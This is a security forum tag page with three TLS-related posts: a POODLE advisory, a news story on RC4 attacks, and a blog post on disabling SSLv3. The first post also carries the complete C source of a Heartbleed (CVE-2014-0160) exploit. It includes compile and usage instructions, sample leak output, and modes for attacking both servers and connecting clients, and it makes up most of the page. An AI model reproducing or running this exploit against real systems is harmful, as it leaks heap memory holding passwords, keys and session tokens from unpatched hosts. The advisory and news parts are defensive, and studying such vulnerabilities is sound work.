Search the Community
Showing results for tags 'tls'.
-
POODLE Revine in forta. Introduction SSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical purposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346], and TLS 1.2 [RFC5246], many TLS implementations remain backwards*compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. The protocol handshake provides for authenticated version negotiation, so normally the latest protocol version common to the client and the server will be used. The POODLE Attack To work with legacy servers, many TLS clients implement a downgrade dance: in a first handshake attempt, offer the highest protocol version supported by the client? if this handshake fails, retry (possibly repeatedly) with earlier protocol versions. Unlike proper protocol version negotiation (if the client offers TLS 1.2, the server may respond with, say, TLS 1.0), this downgrade can also be triggered by network glitches, or by active attackers. So if an attacker that controls the network between the client and the server interferes with any attempted handshake offering TLS 1.0 or later, such clients will readily confine themselves to SSL 3.0. Recommendations The attack described above requires an SSL 3.0 connection to be established, so disabling the SSL 3.0 protocol in the client or in the server (or both) will completely avoid it. If either side supports only SSL 3.0, then all hope is gone, and a serious update required to avoid insecure encryption. If SSL 3.0 is neither disabled nor the only possible protocol version, then the attack is possible if the client uses a downgrade dance for interoperability. Impact The POODLE attack can be used against any system or application that supports SSL 3.0 with CBC mode ciphers. This affects most current browsers and websites, but also includes any software that either references a vulnerable SSL/TLS library (e.g. OpenSSL) or implements the SSL/TLS protocol suite itself. By exploiting this vulnerability in a likely web-based scenario, an attacker can gain access to sensitive data passed within the encrypted web session, such as passwords, cookies and other authentication tokens that can then be used to gain more complete access to a website (impersonating that user, accessing database content, etc.). Solution There is currently no fix for the vulnerability SSL 3.0 itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system/application configurations is the most viable solution currently available. Some of the same researchers that discovered the vulnerability also developed a fix for one of the rerequisite conditions; TLS_FALLBACK_SCSV is a protocol extension that prevents MITM attackers from being able to force a protocol downgrade. OpenSSL has added support for TLS_FALLBACK_SCSV to their latest versions and recommend the following upgrades: - OpenSSL 1.0.1 users should upgrade to 1.0.1j. - OpenSSL 1.0.0 users should upgrade to 1.0.0o. - OpenSSL 0.9.8 users should upgrade to 0.9.8zc. Both clients and servers need to support TLS_FALLBACK_SCSV to prevent downgrade attacks. Other SSL 3.0 implementations are most likely also affected by POODLE. Contact your vendor for details. Additional vendor information may be available in the National Vulnerability Database (NVD) entry for CVE-2014-3566 or in CERT Vulnerability Note VU#577193.[7] Vulnerable TLS implementations need to be updated. CVE ID assignments and vendor information are also available in the NVD.[8] Exploit /* * Heartbleed OpenSSL information leak exploit * ========================================================= * This exploit uses OpenSSL to create an encrypted connection * and trigger the heartbleed leak. The leaked information is * returned within encrypted SSL packets and is then decrypted * and wrote to a file to annoy IDS/forensics. The exploit can * set heartbeat payload length arbitrarily or use two preset * values for NULL and MAX length. The vulnerability occurs due * to bounds checking not being performed on a heap value which * is user supplied and returned to the user as part of DTLS/TLS * heartbeat SSL extension. All versions of OpenSSL 1.0.1 to * 1.0.1f are known affected. You must run this against a target * which is linked to a vulnerable OpenSSL library using DTLS/TLS. * This exploit leaks upto 65535 bytes of remote heap each request * and can be run in a loop until the connected peer ends connection. * The data leaked contains 16 bytes of random padding at the end. * The exploit can be used against a connecting client or server, * it can also send pre_cmd's to plain-text services to establish * an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients * will often forcefully close the connection during large leak * requests so try to lower your payload request size. * * Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g * * E.g. * $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed * $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1 * [ heartbleed OpenSSL information leak exploit * [ ============================================================= * [ connecting to 192.168.11.23 443/tcp * [ connected to 192.168.11.23 443/tcp * [ <3 <3 <3 heart bleed <3 <3 <3 * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ heartbleed leaked length=65535 * [ final record type=24, length=16384 * [ wrote 16381 bytes of heap to file 'out' * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ final record type=24, length=16384 * [ wrote 16384 bytes of heap to file 'out' * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ final record type=24, length=16384 * [ wrote 16384 bytes of heap to file 'out' * [ heartbeat returned type=24 length=16408 * [ decrypting SSL packet * [ final record type=24, length=16384 * [ wrote 16384 bytes of heap to file 'out' * [ heartbeat returned type=24 length=42 * [ decrypting SSL packet * [ final record type=24, length=18 * [ wrote 18 bytes of heap to file 'out' * [ done. * $ ls -al out * -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out * $ hexdump -C out * - snip - snip * * Use following example command to generate certificates for clients. * * $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \ * -keyout server.key -out server.crt * * Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \ * -lssl -Wl,-Bdynamic -lssl3 -lcrypto" * * todo: add udp/dtls support. * * - Beyondtrust * http://www.beyondtrust.com * */ #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <getopt.h> #include <signal.h> #include <netdb.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <inttypes.h> #include <openssl/bio.h> #include <openssl/ssl.h> #include <openssl/err.h> #include <openssl/evp.h> #include <openssl/tls1.h> #include <openssl/rand.h> #include <openssl/buffer.h> #define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \ (((unsigned int)(c[1])) )),c+=2) #define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \ c[1]=(unsigned char)(((s) )&0xff)),c+=2) int first = 0; int leakbytes = 0; int repeat = 1; int badpackets = 0; typedef struct { int socket; SSL *sslHandle; SSL_CTX *sslContext; } connection; typedef struct { unsigned char type; short version; unsigned int length; unsigned char hbtype; unsigned int payload_length; void* payload; } heartbeat; void ssl_init(); void usage(); int tcp_connect(char*,int); int tcp_bind(char*, int); connection* tls_connect(int); connection* tls_bind(int); int pre_cmd(int,int,int); void* heartbleed(connection* ,unsigned int); void* sneakyleaky(connection* ,char*, int); int tcp_connect(char* server,int port){ int sd,ret; struct hostent *host; struct sockaddr_in sa; host = gethostbyname(server); sd = socket(AF_INET, SOCK_STREAM, 0); if(sd==-1){ printf("[!] cannot create socket\n"); exit(0); } sa.sin_family = AF_INET; sa.sin_port = htons(port); sa.sin_addr = *((struct in_addr *) host->h_addr); bzero(&(sa.sin_zero),8); printf("[ connecting to %s %d/tcp\n",server,port); ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr)); if(ret==0){ printf("[ connected to %s %d/tcp\n",server,port); } else{ printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port); exit(0); } return sd; } int tcp_bind(char* server, int port){ int sd, ret, val=1; struct sockaddr_in sin; struct hostent *host; host = gethostbyname(server); sd=socket(AF_INET,SOCK_STREAM,0); if(sd==-1){ printf("[!] cannot create socket\n"); exit(0); } memset(&sin,0,sizeof(sin)); sin.sin_addr=*((struct in_addr *) host->h_addr); sin.sin_family=AF_INET; sin.sin_port=htons(port); setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val)); ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin)); if(ret==-1){ printf("[!] cannot bind socket\n"); exit(0); } listen(sd,5); return(sd); } void ssl_init(){ SSL_load_error_strings(); SSL_library_init(); OpenSSL_add_all_digests(); OpenSSL_add_all_algorithms(); OpenSSL_add_all_ciphers(); } connection* tls_connect(int sd){ connection *c; c = malloc(sizeof(connection)); if(c==NULL){ printf("[ error in malloc()\n"); exit(0); } c->socket = sd; c->sslHandle = NULL; c->sslContext = NULL; c->sslContext = SSL_CTX_new(SSLv23_client_method()); SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); if(c->sslContext==NULL) ERR_print_errors_fp(stderr); c->sslHandle = SSL_new(c->sslContext); if(c->sslHandle==NULL) ERR_print_errors_fp(stderr); if(!SSL_set_fd(c->sslHandle,c->socket)) ERR_print_errors_fp(stderr); if(SSL_connect(c->sslHandle)!=1) ERR_print_errors_fp(stderr); if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ printf("[ warning: heartbeat extension is unsupported (try anyway)\n"); } return c; } connection* tls_bind(int sd){ int bytes; connection *c; char* buf; buf = malloc(4096); if(buf==NULL){ printf("[ error in malloc()\n"); exit(0); } memset(buf,0,4096); c = malloc(sizeof(connection)); if(c==NULL){ printf("[ error in malloc()\n"); exit(0); } c->socket = sd; c->sslHandle = NULL; c->sslContext = NULL; c->sslContext = SSL_CTX_new(SSLv23_server_method()); if(c->sslContext==NULL) ERR_print_errors_fp(stderr); SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); SSL_CTX_SRP_CTX_init(c->sslContext); SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM); SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); if(!SSL_CTX_check_private_key(c->sslContext)){ printf("[!] FATAL: private key does not match the certificate public key\n"); exit(0); } c->sslHandle = SSL_new(c->sslContext); if(c->sslHandle==NULL) ERR_print_errors_fp(stderr); if(!SSL_set_fd(c->sslHandle,c->socket)) ERR_print_errors_fp(stderr); int rc = SSL_accept(c->sslHandle); printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle)); bytes = SSL_read(c->sslHandle, buf, 4095); printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf); if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ printf("[ warning: heartbeat extension is unsupported (try anyway)\n"); } return c; } int pre_cmd(int sd,int precmd,int verbose){ /* this function can be used to send commands to a plain-text service or client before heartbleed exploit attempt. e.g. STARTTLS */ int rc, go = 0; char* buffer; char* line1; char* line2; switch(precmd){ case 0: line1 = "EHLO test\n"; line2 = "STARTTLS\n"; break; case 1: line1 = "CAPA\n"; line2 = "STLS\n"; break; case 2: line1 = "a001 CAPB\n"; line2 = "a002 STARTTLS\n"; break; default: go = 1; break; } if(go==0){ buffer = malloc(2049); if(buffer==NULL){ printf("[ error in malloc()\n"); exit(0); } memset(buffer,0,2049); rc = read(sd,buffer,2048); printf("[ banner: %s",buffer); send(sd,line1,strlen(line1),0); memset(buffer,0,2049); rc = read(sd,buffer,2048); if(verbose==1){ printf("%s\n",buffer); } send(sd,line2,strlen(line2),0); memset(buffer,0,2049); rc = read(sd,buffer,2048); if(verbose==1){ printf("%s\n",buffer); } } return sd; } void* heartbleed(connection *c,unsigned int type){ unsigned char *buf, *p; int ret; buf = OPENSSL_malloc(1 + 2); if(buf==NULL){ printf("[ error in malloc()\n"); exit(0); } p = buf; *p++ = TLS1_HB_REQUEST; switch(type){ case 0: s2n(0x0,p); break; case 1: s2n(0xffff,p); break; default: printf("[ setting heartbeat payload_length to %u\n",type); s2n(type,p); break; } printf("[ <3 <3 <3 heart bleed <3 <3 <3\n"); ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3); OPENSSL_free(buf); return c; } void* sneakyleaky(connection *c,char* filename, int verbose){ char *p; int ssl_major,ssl_minor,al; int enc_err,n,i; SSL3_RECORD *rr; SSL_SESSION *sess; SSL* s; unsigned char md[EVP_MAX_MD_SIZE]; short version; unsigned mac_size, orig_len; size_t extra; rr= &(c->sslHandle->s3->rrec); sess=c->sslHandle->session; s = c->sslHandle; if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER) extra=SSL3_RT_MAX_EXTRA; else extra=0; if ((s->rstate != SSL_ST_READ_BODY) || (s->packet_length < SSL3_RT_HEADER_LENGTH)) { n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0); if (n <= 0) goto apple; s->rstate=SSL_ST_READ_BODY; p=s->packet; rr->type= *(p++); ssl_major= *(p++); ssl_minor= *(p++); version=(ssl_major<<8)|ssl_minor; n2s(p,rr->length); if(rr->type==24){ printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length); if(rr->length > 16834){ printf("[ error: got a malformed TLS length.\n"); exit(0); } } else{ printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length); s->packet_length=0; badpackets++; if(badpackets > 3){ printf("[ error: too many bad packets recieved\n"); exit(0); } goto apple; } } if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){ i=rr->length; n=ssl3_read_n(s,i,i,1); if (n <= 0) goto apple; } printf("[ decrypting SSL packet\n"); s->rstate=SSL_ST_READ_HEADER; rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]); rr->data=rr->input; tls1_enc(s,0); if((sess != NULL) && (s->enc_read_ctx != NULL) && (EVP_MD_CTX_md(s->read_hash) != NULL)) { unsigned char *mac = NULL; unsigned char mac_tmp[EVP_MAX_MD_SIZE]; mac_size=EVP_MD_CTX_size(s->read_hash); OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE); orig_len = rr->length+((unsigned int)rr->type>>8); if(orig_len < mac_size || (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE && orig_len < mac_size+1)){ al=SSL_AD_DECODE_ERROR; SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT); } if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){ mac = mac_tmp; ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len); rr->length -= mac_size; } else{ rr->length -= mac_size; mac = &rr->data[rr->length]; } i = tls1_mac(s,md,0); if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0) enc_err = -1; if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size) enc_err = -1; } if(enc_err < 0){ al=SSL_AD_BAD_RECORD_MAC; SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC); goto apple; } if(s->expand != NULL){ if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) { al=SSL_AD_RECORD_OVERFLOW; SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG); goto apple; } if (!ssl3_do_uncompress(s)) { al=SSL_AD_DECOMPRESSION_FAILURE; SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION); goto apple; } } if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) { al=SSL_AD_RECORD_OVERFLOW; SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG); goto apple; } rr->off=0; s->packet_length=0; if(first==0){ uint heartbleed_len = 0; char* fp = s->s3->rrec.data; (long)fp++; memcpy(&heartbleed_len,fp,2); heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8; first = 2; leakbytes = heartbleed_len + 16; printf("[ heartbleed leaked length=%u\n",heartbleed_len); } if(verbose==1){ { unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); } printf("\n"); } leakbytes-=rr->length; if(leakbytes > 0){ repeat = 1; } else{ repeat = 0; } printf("[ final record type=%d, length=%u\n", rr->type, rr->length); int output = s->s3->rrec.length-3; if(output > 0){ int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); if(first==2){ first--; write(fd,s->s3->rrec.data+3,s->s3->rrec.length); /* first three bytes are resp+len */ printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename); } else{ /* heap data & 16 bytes padding */ write(fd,s->s3->rrec.data+3,s->s3->rrec.length); printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename); } close(fd); } else{ printf("[ nothing from the heap to write\n"); } return; apple: printf("[ problem handling SSL record packet - wrong type?\n"); badpackets++; if(badpackets > 3){ printf("[ error: too many bad packets recieved\n"); exit(0); } return; } void usage(){ printf("[\n"); printf("[ --server|-s <ip/dns> - the server to target\n"); printf("[ --port|-p <port> - the port to target\n"); printf("[ --file|-f <filename> - file to write data to\n"); printf("[ --bind|-b <ip> - bind to ip for exploiting clients\n"); printf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\n"); printf("[ 0 = SMTP\n"); printf("[ 1 = POP3\n"); printf("[ 2 = IMAP\n"); printf("[ --loop|-l - loop the exploit attempts\n"); printf("[ --type|-t <n> - select exploit to try\n"); printf("[ 0 = null length\n"); printf("[ 1 = max leak\n"); printf("[ n = heartbeat payload_length\n"); printf("[\n"); printf("[ --verbose|-v - output leak to screen\n"); printf("[ --help|-h - this output\n"); printf("[\n"); exit(0); } int main(int argc, char* argv[]){ int ret, port, userc, index; int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9; int loop = 0; struct hostent *h; connection* c; char *host, *file; int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0; printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n"); printf("[ =============================================================\n"); static struct option options[] = { {"server", 1, 0, 's'}, {"port", 1, 0, 'p'}, {"file", 1, 0, 'f'}, {"type", 1, 0, 't'}, {"bind", 1, 0, 'b'}, {"verbose", 0, 0, 'v'}, {"precmd", 1, 0, 'c'}, {"loop", 0, 0, 'l'}, {"help", 0, 0,'h'} }; while(userc != -1) { userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index); switch(userc) { case -1: break; case 's': if(ihost==0){ ihost = 1; h = gethostbyname(optarg); if(h==NULL){ printf("[!] FATAL: unknown host '%s'\n",optarg); exit(1); } host = malloc(strlen(optarg) + 1); if(host==NULL){ printf("[ error in malloc()\n"); exit(0); } sprintf(host,"%s",optarg); } break; case 'p': if(iport==0){ port = atoi(optarg); iport = 1; } break; case 'f': if(ifile==0){ file = malloc(strlen(optarg) + 1); if(file==NULL){ printf("[ error in malloc()\n"); exit(0); } sprintf(file,"%s",optarg); ifile = 1; } break; case 't': if(itype==0){ type = atoi(optarg); itype = 1; } break; case 'h': usage(); break; case 'b': if(ihost==0){ ihost = 1; host = malloc(strlen(optarg)+1); if(host==NULL){ printf("[ error in malloc()\n"); exit(0); } sprintf(host,"%s",optarg); bind = 1; } break; case 'c': if(iprecmd == 0){ iprecmd = 1; precmd = atoi(optarg); } break; case 'v': verbose = 1; break; case 'l': loop = 1; break; default: break; } } if(ihost==0||iport==0||ifile==0||itype==0||type < 0){ printf("[ try --help\n"); exit(0); } ssl_init(); if(bind==0){ ret = tcp_connect(host, port); pre_cmd(ret, precmd, verbose); c = tls_connect(ret); heartbleed(c,type); while(repeat==1){ sneakyleaky(c,file,verbose); } while(loop==1){ printf("[ entered heartbleed loop\n"); first=0; repeat=1; heartbleed(c,type); while(repeat==1){ sneakyleaky(c,file,verbose); } } printf("[ done.\n"); exit(0); } else{ int sd, pid, i; ret = tcp_bind(host, port); while(1){ sd=accept(ret,0,0); if(sd==-1){ printf("[!] FATAL: problem with accept()\n"); exit(0); } if(pid=fork()){ close(sd); } else{ c = tls_bind(sd); pre_cmd(ret, precmd, verbose); heartbleed(c,type); while(repeat==1){ sneakyleaky(c,file,verbose); } while(loop==1){ printf("[ entered heartbleed loop\n"); first=0; repeat=0; heartbleed(c,type); while(repeat==1){ sneakyleaky(c,file,verbose); } } printf("[ done.\n"); exit(0); } } } } Source
-
Security researchers have banged another nail into the coffin of the ageing RC4 encryption algorithm. The latest password recovery attacks against RC4 in TLS by Christina Garman of Johns Hopkins University, Prof. Kenny Paterson and research student Thyla van der Merwe (both of Royal Holloway, University of London) show that attacks against the scheme are getting better and easier so RC4 "needs to die", as the researchers themselves put it. The continued use of RC4 in TLS is "increasingly indefensible", the researchers conclude in an abstract of their work. The research - which also involved the development of "proof of concept" implementations of the attacks against the BasicAuth and IMAP protocols – is explained in full in a paper here (PDF, 34 pages). Independent researchers agree that RC4 needs to be pensioned off even though some question whether the attack developed by is a practical concern. "RC4 must die. Despite, not because of, attacks like the one described here which is extremely impractical," said Martijn Grooten, editor of Virus Bulletin and occasional security researcher. Caveats about whether or not attacks could be economically pulled off aside, there's little or no disagreement about the direction of travel, which is that the cipher ought to be consigned straight towards the cyber equivalent of Boot Hill cemetery. The only reason it's still around is that websites are reluctant to drop support even for obsolete technology. RC4, developed in 1987, is a popular stream cipher that's often used in HTTPS connections to protect sensitive network traffic from eavesdroppers, among other uses. Potential attacks have been documented for years but they are now decreasing in complexity to the point where using the cipher is risky even before considering the implication of the revelations from NSA whistleblower Edward Snowden. Leaks from Snowden suggested that US and UK spies have developed "groundbreaking cryptanalysis capabilities", which ultimately allow the intelligence agencies to break RC4 encryption. Distrust of the cipher is spreading. Microsoft urged Windows developers to ditch the RC4 encryption algorithm and pick something stronger back in November 2013. Cisco also told its customers to "avoid" the cipher around the same time. The IETF moved towards killing off the venerable-but-vulnerable RC4 cipher with a proposal that net-standard clients and servers need to quit using RC4 in Transport Layer Security (TLS) that surfaced in December 2014. Source
-
Google, among several security organizations, recently announced a vulnerability in the SSL protocol, particularly SSL version 3. SSL is used to secure connections between a client and server to prevent eavesdropping, and that the data has not been tampered. SSLv3 is an old version of the SSL protocol, dating back to 1996 and debuted with Netscape Navigator. While a very old version of SSL, it is still widely supported by browsers and servers today. According to SSL Pulse, 98% of web servers support SSLv3 in October 2014. Fortunately more secure replacements for SSLv3 have existed for a long time, such as TLS 1.0. Since TLS has been widely adopted for several years now, nearly all browsers will opt to use TLS instead of SSLv3. The POODLE vulnerability is a flaw in the design of the algorithm, not a bug in a particular software implementation like Heartbleed. POODLE is similar to the BEAST attack, which targets SSLv3 and ciphers that use cipher block chaining (CBC). POODLE (Padding Oracle On Downgraded Legacy) targets users by being active on the network, similar to a man-in-the-middle attack. With the attacker having access to the network, he can force the SSL connection to the lower-grade protocol SSLv3 by interrupting the SSL handshake. Once the attacker has forced the connection to use SSLv3, he can attack the client and force characteristics of the connection that make it predictable. One way an attacker might accomplish this is with a Cross Site Scripting, or XSS. If the attacker is successful, he will be able to steal sensitive information such as authentication cookies. The simplest and most effective way to address this is to completely disable support for SSLv3. This is recommended for server administrators to ensure no clients connect to their resources using old versions of SSL. In another blog post we detailed how to lock down and remove older versions of SSL from the server. For desktop administrators, disable support for SSLv3 at the browser level. This can be accomplished with Group Policy for Internet Explorer. Since TLS is widely deployed, turning off SSLv3 support will have a small impact on most people. Internet Explorer 6 remains the only browser that does not support anything better than SSLv3. As support for SSLv3 is removed over the coming weeks, IE 6 users will have more difficulty using secure websites. IE 6 does support TLS 1.0, however is off by default. Enabling TLS 1.0 in IE 6 can be used as a short term work around until a newer version of IE is installed. Source